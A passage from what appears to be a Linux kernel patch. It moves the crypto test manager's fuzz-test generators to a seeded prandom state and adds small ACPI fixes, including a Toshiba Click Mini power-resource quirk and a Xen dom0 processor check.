++	return floor + prandom_u32_below(rng, ceil - floor + 1);
++}
++
+ /* Generate a random length in range [0, max_len], but prefer smaller values */
+-static unsigned int generate_random_length(unsigned int max_len)
++static unsigned int generate_random_length(struct rnd_state *rng,
++					   unsigned int max_len)
+ {
+-	unsigned int len = get_random_u32_below(max_len + 1);
++	unsigned int len = prandom_u32_below(rng, max_len + 1);
+ 
+-	switch (get_random_u32_below(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 		return len % 64;
+ 	case 1:
+@@ -870,43 +908,44 @@ static unsigned int generate_random_length(unsigned int max_len)
+ }
+ 
+ /* Flip a random bit in the given nonempty data buffer */
+-static void flip_random_bit(u8 *buf, size_t size)
++static void flip_random_bit(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+ 	size_t bitpos;
+ 
+-	bitpos = get_random_u32_below(size * 8);
++	bitpos = prandom_u32_below(rng, size * 8);
+ 	buf[bitpos / 8] ^= 1 << (bitpos % 8);
+ }
+ 
+ /* Flip a random byte in the given nonempty data buffer */
+-static void flip_random_byte(u8 *buf, size_t size)
++static void flip_random_byte(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+-	buf[get_random_u32_below(size)] ^= 0xff;
++	buf[prandom_u32_below(rng, size)] ^= 0xff;
+ }
+ 
+ /* Sometimes make some random changes to the given nonempty data buffer */
+-static void mutate_buffer(u8 *buf, size_t size)
++static void mutate_buffer(struct rnd_state *rng, u8 *buf, size_t size)
+ {
+ 	size_t num_flips;
+ 	size_t i;
+ 
+ 	/* Sometimes flip some bits */
+-	if (get_random_u32_below(4) == 0) {
+-		num_flips = min_t(size_t, 1 << get_random_u32_below(8), size * 8);
++	if (prandom_u32_below(rng, 4) == 0) {
++		num_flips = min_t(size_t, 1 << prandom_u32_below(rng, 8),
++				  size * 8);
+ 		for (i = 0; i < num_flips; i++)
+-			flip_random_bit(buf, size);
++			flip_random_bit(rng, buf, size);
+ 	}
+ 
+ 	/* Sometimes flip some bytes */
+-	if (get_random_u32_below(4) == 0) {
+-		num_flips = min_t(size_t, 1 << get_random_u32_below(8), size);
++	if (prandom_u32_below(rng, 4) == 0) {
++		num_flips = min_t(size_t, 1 << prandom_u32_below(rng, 8), size);
+ 		for (i = 0; i < num_flips; i++)
+-			flip_random_byte(buf, size);
++			flip_random_byte(rng, buf, size);
+ 	}
+ }
+ 
+ /* Randomly generate 'count' bytes, but sometimes make them "interesting" */
+-static void generate_random_bytes(u8 *buf, size_t count)
++static void generate_random_bytes(struct rnd_state *rng, u8 *buf, size_t count)
+ {
+ 	u8 b;
+ 	u8 increment;
+@@ -915,11 +954,11 @@ static void generate_random_bytes(u8 *buf, size_t count)
+ 	if (count == 0)
+ 		return;
+ 
+-	switch (get_random_u32_below(8)) { /* Choose a generation strategy */
++	switch (prandom_u32_below(rng, 8)) { /* Choose a generation strategy */
+ 	case 0:
+ 	case 1:
+ 		/* All the same byte, plus optional mutations */
+-		switch (get_random_u32_below(4)) {
++		switch (prandom_u32_below(rng, 4)) {
+ 		case 0:
+ 			b = 0x00;
+ 			break;
+@@ -927,28 +966,28 @@ static void generate_random_bytes(u8 *buf, size_t count)
+ 			b = 0xff;
+ 			break;
+ 		default:
+-			b = get_random_u8();
++			b = prandom_u8(rng);
+ 			break;
+ 		}
+ 		memset(buf, b, count);
+-		mutate_buffer(buf, count);
++		mutate_buffer(rng, buf, count);
+ 		break;
+ 	case 2:
+ 		/* Ascending or descending bytes, plus optional mutations */
+-		increment = get_random_u8();
+-		b = get_random_u8();
++		increment = prandom_u8(rng);
++		b = prandom_u8(rng);
+ 		for (i = 0; i < count; i++, b += increment)
+ 			buf[i] = b;
+-		mutate_buffer(buf, count);
++		mutate_buffer(rng, buf, count);
+ 		break;
+ 	default:
+ 		/* Fully random bytes */
+-		for (i = 0; i < count; i++)
+-			buf[i] = get_random_u8();
++		prandom_bytes_state(rng, buf, count);
+ 	}
+ }
+ 
+-static char *generate_random_sgl_divisions(struct test_sg_division *divs,
++static char *generate_random_sgl_divisions(struct rnd_state *rng,
++					   struct test_sg_division *divs,
+ 					   size_t max_divs, char *p, char *end,
+ 					   bool gen_flushes, u32 req_flags)
+ {
+@@ -959,24 +998,26 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ 		unsigned int this_len;
+ 		const char *flushtype_str;
+ 
+-		if (div == &divs[max_divs - 1] || get_random_u32_below(2) == 0)
++		if (div == &divs[max_divs - 1] || prandom_bool(rng))
+ 			this_len = remaining;
+ 		else
+-			this_len = get_random_u32_inclusive(1, remaining);
++			this_len = prandom_u32_inclusive(rng, 1, remaining);
+ 		div->proportion_of_total = this_len;
+ 
+-		if (get_random_u32_below(4) == 0)
+-			div->offset = get_random_u32_inclusive(PAGE_SIZE - 128, PAGE_SIZE - 1);
+-		else if (get_random_u32_below(2) == 0)
+-			div->offset = get_random_u32_below(32);
++		if (prandom_u32_below(rng, 4) == 0)
++			div->offset = prandom_u32_inclusive(rng,
++							    PAGE_SIZE - 128,
++							    PAGE_SIZE - 1);
++		else if (prandom_bool(rng))
++			div->offset = prandom_u32_below(rng, 32);
+ 		else
+-			div->offset = get_random_u32_below(PAGE_SIZE);
+-		if (get_random_u32_below(8) == 0)
++			div->offset = prandom_u32_below(rng, PAGE_SIZE);
++		if (prandom_u32_below(rng, 8) == 0)
+ 			div->offset_relative_to_alignmask = true;
+ 
+ 		div->flush_type = FLUSH_TYPE_NONE;
+ 		if (gen_flushes) {
+-			switch (get_random_u32_below(4)) {
++			switch (prandom_u32_below(rng, 4)) {
+ 			case 0:
+ 				div->flush_type = FLUSH_TYPE_REIMPORT;
+ 				break;
+@@ -988,7 +1029,7 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ 
+ 		if (div->flush_type != FLUSH_TYPE_NONE &&
+ 		    !(req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) &&
+-		    get_random_u32_below(2) == 0)
++		    prandom_bool(rng))
+ 			div->nosimd = true;
+ 
+ 		switch (div->flush_type) {
+@@ -1023,7 +1064,8 @@ static char *generate_random_sgl_divisions(struct test_sg_division *divs,
+ }
+ 
+ /* Generate a random testvec_config for fuzz testing */
+-static void generate_random_testvec_config(struct testvec_config *cfg,
++static void generate_random_testvec_config(struct rnd_state *rng,
++					   struct testvec_config *cfg,
+ 					   char *name, size_t max_namelen)
+ {
+ 	char *p = name;
+@@ -1035,7 +1077,7 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 
+ 	p += scnprintf(p, end - p, "random:");
+ 
+-	switch (get_random_u32_below(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 	case 1:
+ 		cfg->inplace_mode = OUT_OF_PLACE;
+@@ -1050,12 +1092,12 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 		break;
+ 	}
+ 
+-	if (get_random_u32_below(2) == 0) {
++	if (prandom_bool(rng)) {
+ 		cfg->req_flags |= CRYPTO_TFM_REQ_MAY_SLEEP;
+ 		p += scnprintf(p, end - p, " may_sleep");
+ 	}
+ 
+-	switch (get_random_u32_below(4)) {
++	switch (prandom_u32_below(rng, 4)) {
+ 	case 0:
+ 		cfg->finalization_type = FINALIZATION_TYPE_FINAL;
+ 		p += scnprintf(p, end - p, " use_final");
+@@ -1070,36 +1112,37 @@ static void generate_random_testvec_config(struct testvec_config *cfg,
+ 		break;
+ 	}
+ 
+-	if (!(cfg->req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) &&
+-	    get_random_u32_below(2) == 0) {
++	if (!(cfg->req_flags & CRYPTO_TFM_REQ_MAY_SLEEP) && prandom_bool(rng)) {
+ 		cfg->nosimd = true;
+ 		p += scnprintf(p, end - p, " nosimd");
+ 	}
+ 
+ 	p += scnprintf(p, end - p, " src_divs=[");
+-	p = generate_random_sgl_divisions(cfg->src_divs,
++	p = generate_random_sgl_divisions(rng, cfg->src_divs,
+ 					  ARRAY_SIZE(cfg->src_divs), p, end,
+ 					  (cfg->finalization_type !=
+ 					   FINALIZATION_TYPE_DIGEST),
+ 					  cfg->req_flags);
+ 	p += scnprintf(p, end - p, "]");
+ 
+-	if (cfg->inplace_mode == OUT_OF_PLACE && get_random_u32_below(2) == 0) {
++	if (cfg->inplace_mode == OUT_OF_PLACE && prandom_bool(rng)) {
+ 		p += scnprintf(p, end - p, " dst_divs=[");
+-		p = generate_random_sgl_divisions(cfg->dst_divs,
++		p = generate_random_sgl_divisions(rng, cfg->dst_divs,
+ 						  ARRAY_SIZE(cfg->dst_divs),
+ 						  p, end, false,
+ 						  cfg->req_flags);
+ 		p += scnprintf(p, end - p, "]");
+ 	}
+ 
+-	if (get_random_u32_below(2) == 0) {
+-		cfg->iv_offset = get_random_u32_inclusive(1, MAX_ALGAPI_ALIGNMASK);
++	if (prandom_bool(rng)) {
++		cfg->iv_offset = prandom_u32_inclusive(rng, 1,
++						       MAX_ALGAPI_ALIGNMASK);
+ 		p += scnprintf(p, end - p, " iv_offset=%u", cfg->iv_offset);
+ 	}
+ 
+-	if (get_random_u32_below(2) == 0) {
+-		cfg->key_offset = get_random_u32_inclusive(1, MAX_ALGAPI_ALIGNMASK);
++	if (prandom_bool(rng)) {
++		cfg->key_offset = prandom_u32_inclusive(rng, 1,
++							MAX_ALGAPI_ALIGNMASK);
+ 		p += scnprintf(p, end - p, " key_offset=%u", cfg->key_offset);
+ 	}
+ 
+@@ -1612,11 +1655,14 @@ static int test_hash_vec(const struct hash_testvec *vec, unsigned int vec_num,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_hash_vec_cfg(vec, vec_name, &cfg,
+ 						req, desc, tsgl, hashstate);
+@@ -1634,15 +1680,16 @@ static int test_hash_vec(const struct hash_testvec *vec, unsigned int vec_num,
+  * Generate a hash test vector from the given implementation.
+  * Assumes the buffers in 'vec' were already allocated.
+  */
+-static void generate_random_hash_testvec(struct shash_desc *desc,
++static void generate_random_hash_testvec(struct rnd_state *rng,
++					 struct shash_desc *desc,
+ 					 struct hash_testvec *vec,
+ 					 unsigned int maxkeysize,
+ 					 unsigned int maxdatasize,
+ 					 char *name, size_t max_namelen)
+ {
+ 	/* Data */
+-	vec->psize = generate_random_length(maxdatasize);
+-	generate_random_bytes((u8 *)vec->plaintext, vec->psize);
++	vec->psize = generate_random_length(rng, maxdatasize);
++	generate_random_bytes(rng, (u8 *)vec->plaintext, vec->psize);
+ 
+ 	/*
+ 	 * Key: length in range [1, maxkeysize], but usually choose maxkeysize.
+@@ -1652,9 +1699,9 @@ static void generate_random_hash_testvec(struct shash_desc *desc,
+ 	vec->ksize = 0;
+ 	if (maxkeysize) {
+ 		vec->ksize = maxkeysize;
+-		if (get_random_u32_below(4) == 0)
+-			vec->ksize = get_random_u32_inclusive(1, maxkeysize);
+-		generate_random_bytes((u8 *)vec->key, vec->ksize);
++		if (prandom_u32_below(rng, 4) == 0)
++			vec->ksize = prandom_u32_inclusive(rng, 1, maxkeysize);
++		generate_random_bytes(rng, (u8 *)vec->key, vec->ksize);
+ 
+ 		vec->setkey_error = crypto_shash_setkey(desc->tfm, vec->key,
+ 							vec->ksize);
+@@ -1688,6 +1735,7 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	const unsigned int maxdatasize = (2 * PAGE_SIZE) - TESTMGR_POISON_LEN;
+ 	const char *algname = crypto_hash_alg_common(tfm)->base.cra_name;
+ 	const char *driver = crypto_ahash_driver_name(tfm);
++	struct rnd_state rng;
+ 	char _generic_driver[CRYPTO_MAX_ALG_NAME];
+ 	struct crypto_shash *generic_tfm = NULL;
+ 	struct shash_desc *generic_desc = NULL;
+@@ -1701,6 +1749,8 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	if (noextratests)
+ 		return 0;
+ 
++	init_rnd_state(&rng);
++
+ 	if (!generic_driver) { /* Use default naming convention? */
+ 		err = build_generic_driver_name(algname, _generic_driver);
+ 		if (err)
+@@ -1769,10 +1819,11 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	}
+ 
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_hash_testvec(generic_desc, &vec,
++		generate_random_hash_testvec(&rng, generic_desc, &vec,
+ 					     maxkeysize, maxdatasize,
+ 					     vec_name, sizeof(vec_name));
+-		generate_random_testvec_config(cfg, cfgname, sizeof(cfgname));
++		generate_random_testvec_config(&rng, cfg, cfgname,
++					       sizeof(cfgname));
+ 
+ 		err = test_hash_vec_cfg(&vec, vec_name, cfg,
+ 					req, desc, tsgl, hashstate);
+@@ -2174,11 +2225,14 @@ static int test_aead_vec(int enc, const struct aead_testvec *vec,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_aead_vec_cfg(enc, vec, vec_name,
+ 						&cfg, req, tsgls);
+@@ -2194,6 +2248,7 @@ static int test_aead_vec(int enc, const struct aead_testvec *vec,
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 
+ struct aead_extra_tests_ctx {
++	struct rnd_state rng;
+ 	struct aead_request *req;
+ 	struct crypto_aead *tfm;
+ 	const struct alg_test_desc *test_desc;
+@@ -2212,24 +2267,26 @@ struct aead_extra_tests_ctx {
+  * here means the full ciphertext including the authentication tag.  The
+  * authentication tag (and hence also the ciphertext) is assumed to be nonempty.
+  */
+-static void mutate_aead_message(struct aead_testvec *vec, bool aad_iv,
++static void mutate_aead_message(struct rnd_state *rng,
++				struct aead_testvec *vec, bool aad_iv,
+ 				unsigned int ivsize)
+ {
+ 	const unsigned int aad_tail_size = aad_iv ? ivsize : 0;
+ 	const unsigned int authsize = vec->clen - vec->plen;
+ 
+-	if (get_random_u32_below(2) == 0 && vec->alen > aad_tail_size) {
++	if (prandom_bool(rng) && vec->alen > aad_tail_size) {
+ 		 /* Mutate the AAD */
+-		flip_random_bit((u8 *)vec->assoc, vec->alen - aad_tail_size);
+-		if (get_random_u32_below(2) == 0)
++		flip_random_bit(rng, (u8 *)vec->assoc,
++				vec->alen - aad_tail_size);
++		if (prandom_bool(rng))
+ 			return;
+ 	}
+-	if (get_random_u32_below(2) == 0) {
++	if (prandom_bool(rng)) {
+ 		/* Mutate auth tag (assuming it's at the end of ciphertext) */
+-		flip_random_bit((u8 *)vec->ctext + vec->plen, authsize);
++		flip_random_bit(rng, (u8 *)vec->ctext + vec->plen, authsize);
+ 	} else {
+ 		/* Mutate any part of the ciphertext */
+-		flip_random_bit((u8 *)vec->ctext, vec->clen);
++		flip_random_bit(rng, (u8 *)vec->ctext, vec->clen);
+ 	}
+ }
+ 
+@@ -2240,7 +2297,8 @@ static void mutate_aead_message(struct aead_testvec *vec, bool aad_iv,
+  */
+ #define MIN_COLLISION_FREE_AUTHSIZE 8
+ 
+-static void generate_aead_message(struct aead_request *req,
++static void generate_aead_message(struct rnd_state *rng,
++				  struct aead_request *req,
+ 				  const struct aead_test_suite *suite,
+ 				  struct aead_testvec *vec,
+ 				  bool prefer_inauthentic)
+@@ -2249,17 +2307,18 @@ static void generate_aead_message(struct aead_request *req,
+ 	const unsigned int ivsize = crypto_aead_ivsize(tfm);
+ 	const unsigned int authsize = vec->clen - vec->plen;
+ 	const bool inauthentic = (authsize >= MIN_COLLISION_FREE_AUTHSIZE) &&
+-				 (prefer_inauthentic || get_random_u32_below(4) == 0);
++				 (prefer_inauthentic ||
++				  prandom_u32_below(rng, 4) == 0);
+ 
+ 	/* Generate the AAD. */
+-	generate_random_bytes((u8 *)vec->assoc, vec->alen);
++	generate_random_bytes(rng, (u8 *)vec->assoc, vec->alen);
+ 	if (suite->aad_iv && vec->alen >= ivsize)
+ 		/* Avoid implementation-defined behavior. */
+ 		memcpy((u8 *)vec->assoc + vec->alen - ivsize, vec->iv, ivsize);
+ 
+-	if (inauthentic && get_random_u32_below(2) == 0) {
++	if (inauthentic && prandom_bool(rng)) {
+ 		/* Generate a random ciphertext. */
+-		generate_random_bytes((u8 *)vec->ctext, vec->clen);
++		generate_random_bytes(rng, (u8 *)vec->ctext, vec->clen);
+ 	} else {
+ 		int i = 0;
+ 		struct scatterlist src[2], dst;
+@@ -2271,7 +2330,7 @@ static void generate_aead_message(struct aead_request *req,
+ 		if (vec->alen)
+ 			sg_set_buf(&src[i++], vec->assoc, vec->alen);
+ 		if (vec->plen) {
+-			generate_random_bytes((u8 *)vec->ptext, vec->plen);
++			generate_random_bytes(rng, (u8 *)vec->ptext, vec->plen);
+ 			sg_set_buf(&src[i++], vec->ptext, vec->plen);
+ 		}
+ 		sg_init_one(&dst, vec->ctext, vec->alen + vec->clen);
+@@ -2291,7 +2350,7 @@ static void generate_aead_message(struct aead_request *req,
+ 		 * Mutate the authentic (ciphertext, AAD) pair to get an
+ 		 * inauthentic one.
+ 		 */
+-		mutate_aead_message(vec, suite->aad_iv, ivsize);
++		mutate_aead_message(rng, vec, suite->aad_iv, ivsize);
+ 	}
+ 	vec->novrfy = 1;
+ 	if (suite->einval_allowed)
+@@ -2305,7 +2364,8 @@ static void generate_aead_message(struct aead_request *req,
+  * If 'prefer_inauthentic' is true, then this function will generate inauthentic
+  * test vectors (i.e. vectors with 'vec->novrfy=1') more often.
+  */
+-static void generate_random_aead_testvec(struct aead_request *req,
++static void generate_random_aead_testvec(struct rnd_state *rng,
++					 struct aead_request *req,
+ 					 struct aead_testvec *vec,
+ 					 const struct aead_test_suite *suite,
+ 					 unsigned int maxkeysize,
+@@ -2321,18 +2381,18 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 
+ 	/* Key: length in [0, maxkeysize], but usually choose maxkeysize */
+ 	vec->klen = maxkeysize;
+-	if (get_random_u32_below(4) == 0)
+-		vec->klen = get_random_u32_below(maxkeysize + 1);
+-	generate_random_bytes((u8 *)vec->key, vec->klen);
++	if (prandom_u32_below(rng, 4) == 0)
++		vec->klen = prandom_u32_below(rng, maxkeysize + 1);
++	generate_random_bytes(rng, (u8 *)vec->key, vec->klen);
+ 	vec->setkey_error = crypto_aead_setkey(tfm, vec->key, vec->klen);
+ 
+ 	/* IV */
+-	generate_random_bytes((u8 *)vec->iv, ivsize);
++	generate_random_bytes(rng, (u8 *)vec->iv, ivsize);
+ 
+ 	/* Tag length: in [0, maxauthsize], but usually choose maxauthsize */
+ 	authsize = maxauthsize;
+-	if (get_random_u32_below(4) == 0)
+-		authsize = get_random_u32_below(maxauthsize + 1);
++	if (prandom_u32_below(rng, 4) == 0)
++		authsize = prandom_u32_below(rng, maxauthsize + 1);
+ 	if (prefer_inauthentic && authsize < MIN_COLLISION_FREE_AUTHSIZE)
+ 		authsize = MIN_COLLISION_FREE_AUTHSIZE;
+ 	if (WARN_ON(authsize > maxdatasize))
+@@ -2341,11 +2401,11 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 	vec->setauthsize_error = crypto_aead_setauthsize(tfm, authsize);
+ 
+ 	/* AAD, plaintext, and ciphertext lengths */
+-	total_len = generate_random_length(maxdatasize);
+-	if (get_random_u32_below(4) == 0)
++	total_len = generate_random_length(rng, maxdatasize);
++	if (prandom_u32_below(rng, 4) == 0)
+ 		vec->alen = 0;
+ 	else
+-		vec->alen = generate_random_length(total_len);
++		vec->alen = generate_random_length(rng, total_len);
+ 	vec->plen = total_len - vec->alen;
+ 	vec->clen = vec->plen + authsize;
+ 
+@@ -2356,7 +2416,7 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 	vec->novrfy = 0;
+ 	vec->crypt_error = 0;
+ 	if (vec->setkey_error == 0 && vec->setauthsize_error == 0)
+-		generate_aead_message(req, suite, vec, prefer_inauthentic);
++		generate_aead_message(rng, req, suite, vec, prefer_inauthentic);
+ 	snprintf(name, max_namelen,
+ 		 "\"random: alen=%u plen=%u authsize=%u klen=%u novrfy=%d\"",
+ 		 vec->alen, vec->plen, authsize, vec->klen, vec->novrfy);
+@@ -2368,7 +2428,7 @@ static void try_to_generate_inauthentic_testvec(
+ 	int i;
+ 
+ 	for (i = 0; i < 10; i++) {
+-		generate_random_aead_testvec(ctx->req, &ctx->vec,
++		generate_random_aead_testvec(&ctx->rng, ctx->req, &ctx->vec,
+ 					     &ctx->test_desc->suite.aead,
+ 					     ctx->maxkeysize, ctx->maxdatasize,
+ 					     ctx->vec_name,
+@@ -2399,7 +2459,8 @@ static int test_aead_inauthentic_inputs(struct aead_extra_tests_ctx *ctx)
+ 		 */
+ 		try_to_generate_inauthentic_testvec(ctx);
+ 		if (ctx->vec.novrfy) {
+-			generate_random_testvec_config(&ctx->cfg, ctx->cfgname,
++			generate_random_testvec_config(&ctx->rng, &ctx->cfg,
++						       ctx->cfgname,
+ 						       sizeof(ctx->cfgname));
+ 			err = test_aead_vec_cfg(DECRYPT, &ctx->vec,
+ 						ctx->vec_name, &ctx->cfg,
+@@ -2489,12 +2550,13 @@ static int test_aead_vs_generic_impl(struct aead_extra_tests_ctx *ctx)
+ 	 * the other implementation against them.
+ 	 */
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_aead_testvec(generic_req, &ctx->vec,
++		generate_random_aead_testvec(&ctx->rng, generic_req, &ctx->vec,
+ 					     &ctx->test_desc->suite.aead,
+ 					     ctx->maxkeysize, ctx->maxdatasize,
+ 					     ctx->vec_name,
+ 					     sizeof(ctx->vec_name), false);
+-		generate_random_testvec_config(&ctx->cfg, ctx->cfgname,
++		generate_random_testvec_config(&ctx->rng, &ctx->cfg,
++					       ctx->cfgname,
+ 					       sizeof(ctx->cfgname));
+ 		if (!ctx->vec.novrfy) {
+ 			err = test_aead_vec_cfg(ENCRYPT, &ctx->vec,
+@@ -2533,6 +2595,7 @@ static int test_aead_extra(const struct alg_test_desc *test_desc,
+ 	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+ 		return -ENOMEM;
++	init_rnd_state(&ctx->rng);
+ 	ctx->req = req;
+ 	ctx->tfm = crypto_aead_reqtfm(req);
+ 	ctx->test_desc = test_desc;
+@@ -2922,11 +2985,14 @@ static int test_skcipher_vec(int enc, const struct cipher_testvec *vec,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_skcipher_vec_cfg(enc, vec, vec_name,
+ 						    &cfg, req, tsgls);
+@@ -2944,7 +3010,8 @@ static int test_skcipher_vec(int enc, const struct cipher_testvec *vec,
+  * Generate a symmetric cipher test vector from the given implementation.
+  * Assumes the buffers in 'vec' were already allocated.
+  */
+-static void generate_random_cipher_testvec(struct skcipher_request *req,
++static void generate_random_cipher_testvec(struct rnd_state *rng,
++					   struct skcipher_request *req,
+ 					   struct cipher_testvec *vec,
+ 					   unsigned int maxdatasize,
+ 					   char *name, size_t max_namelen)
+@@ -2958,17 +3025,17 @@ static void generate_random_cipher_testvec(struct skcipher_request *req,
+ 
+ 	/* Key: length in [0, maxkeysize], but usually choose maxkeysize */
+ 	vec->klen = maxkeysize;
+-	if (get_random_u32_below(4) == 0)
+-		vec->klen = get_random_u32_below(maxkeysize + 1);
+-	generate_random_bytes((u8 *)vec->key, vec->klen);
++	if (prandom_u32_below(rng, 4) == 0)
++		vec->klen = prandom_u32_below(rng, maxkeysize + 1);
++	generate_random_bytes(rng, (u8 *)vec->key, vec->klen);
+ 	vec->setkey_error = crypto_skcipher_setkey(tfm, vec->key, vec->klen);
+ 
+ 	/* IV */
+-	generate_random_bytes((u8 *)vec->iv, ivsize);
++	generate_random_bytes(rng, (u8 *)vec->iv, ivsize);
+ 
+ 	/* Plaintext */
+-	vec->len = generate_random_length(maxdatasize);
+-	generate_random_bytes((u8 *)vec->ptext, vec->len);
++	vec->len = generate_random_length(rng, maxdatasize);
++	generate_random_bytes(rng, (u8 *)vec->ptext, vec->len);
+ 
+ 	/* If the key couldn't be set, no need to continue to encrypt. */
+ 	if (vec->setkey_error)
+@@ -3010,6 +3077,7 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	const unsigned int maxdatasize = (2 * PAGE_SIZE) - TESTMGR_POISON_LEN;
+ 	const char *algname = crypto_skcipher_alg(tfm)->base.cra_name;
+ 	const char *driver = crypto_skcipher_driver_name(tfm);
++	struct rnd_state rng;
+ 	char _generic_driver[CRYPTO_MAX_ALG_NAME];
+ 	struct crypto_skcipher *generic_tfm = NULL;
+ 	struct skcipher_request *generic_req = NULL;
+@@ -3027,6 +3095,8 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	if (strncmp(algname, "kw(", 3) == 0)
+ 		return 0;
+ 
++	init_rnd_state(&rng);
++
+ 	if (!generic_driver) { /* Use default naming convention? */
+ 		err = build_generic_driver_name(algname, _generic_driver);
+ 		if (err)
+@@ -3111,9 +3181,11 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	}
+ 
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_cipher_testvec(generic_req, &vec, maxdatasize,
++		generate_random_cipher_testvec(&rng, generic_req, &vec,
++					       maxdatasize,
+ 					       vec_name, sizeof(vec_name));
+-		generate_random_testvec_config(cfg, cfgname, sizeof(cfgname));
++		generate_random_testvec_config(&rng, cfg, cfgname,
++					       sizeof(cfgname));
+ 
+ 		err = test_skcipher_vec_cfg(ENCRYPT, &vec, vec_name,
+ 					    cfg, req, tsgls);
+diff --git a/drivers/acpi/bus.c b/drivers/acpi/bus.c
+index 7c16bc15e7a14..837cd86d0316b 100644
+--- a/drivers/acpi/bus.c
++++ b/drivers/acpi/bus.c
+@@ -589,6 +589,7 @@ static void acpi_device_remove_notify_handler(struct acpi_device *device,
+ 		acpi_remove_notify_handler(device->handle, type,
+ 					   acpi_notify_device);
+ 	}
++	acpi_os_wait_events_complete();
+ }
+ 
+ /* Handle events targeting \_SB device (at present only graceful shutdown) */
+diff --git a/drivers/acpi/power.c b/drivers/acpi/power.c
+index 23507d29f0006..c2c70139c4f1d 100644
+--- a/drivers/acpi/power.c
++++ b/drivers/acpi/power.c
+@@ -23,6 +23,7 @@
+ 
+ #define pr_fmt(fmt) "ACPI: PM: " fmt
+ 
++#include <linux/dmi.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/init.h>
+@@ -1022,6 +1023,21 @@ void acpi_resume_power_resources(void)
+ }
+ #endif
+ 
++static const struct dmi_system_id dmi_leave_unused_power_resources_on[] = {
++	{
++		/*
++		 * The Toshiba Click Mini has a CPR3 power-resource which must
++		 * be on for the touchscreen to work, but which is not in any
++		 * _PR? lists. The other 2 affected power-resources are no-ops.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "SATELLITE Click Mini L9W-B"),
++		},
++	},
++	{}
++};
++
+ /**
+  * acpi_turn_off_unused_power_resources - Turn off power resources not in use.
+  */
+@@ -1029,6 +1045,9 @@ void acpi_turn_off_unused_power_resources(void)
+ {
+ 	struct acpi_power_resource *resource;
+ 
++	if (dmi_check_system(dmi_leave_unused_power_resources_on))
++		return;
++
+ 	mutex_lock(&power_resource_list_lock);
+ 
+ 	list_for_each_entry_reverse(resource, &acpi_power_resource_list, list_node) {
+diff --git a/drivers/acpi/processor_pdc.c b/drivers/acpi/processor_pdc.c
+index 8c3f82c9fff35..18fb04523f93b 100644
+--- a/drivers/acpi/processor_pdc.c
++++ b/drivers/acpi/processor_pdc.c
+@@ -14,6 +14,8 @@
+ #include <linux/acpi.h>
+ #include <acpi/processor.h>
+ 
++#include <xen/xen.h>
++
+ #include "internal.h"
+ 
+ static bool __init processor_physically_present(acpi_handle handle)
+@@ -47,6 +49,15 @@ static bool __init processor_physically_present(acpi_handle handle)
+ 		return false;
+ 	}
+ 
++	if (xen_initial_domain())
++		/*
++		 * When running as a Xen dom0 the number of processors Linux
++		 * sees can be different from the real number of processors on
++		 * the system, and we still need to execute _PDC for all of
++		 * them.
++		 */
++		return xen_processor_present(acpi_id);
++
+ 	type = (acpi_type == ACPI_TYPE_DEVICE) ? 1 : 0;
+ 	cpuid = acpi_get_cpuid(handle, type, acpi_id);
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index e85729fc481fd..295744fe7c920 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -299,20 +299,6 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
+-	/*
+-	 * Older models with nvidia GPU which need acpi_video backlight
+-	 * control and where the old nvidia binary driver series does not
+-	 * call acpi_video_register_backlight().
+-	 */
+-	{
+-	 .callback = video_detect_force_video,
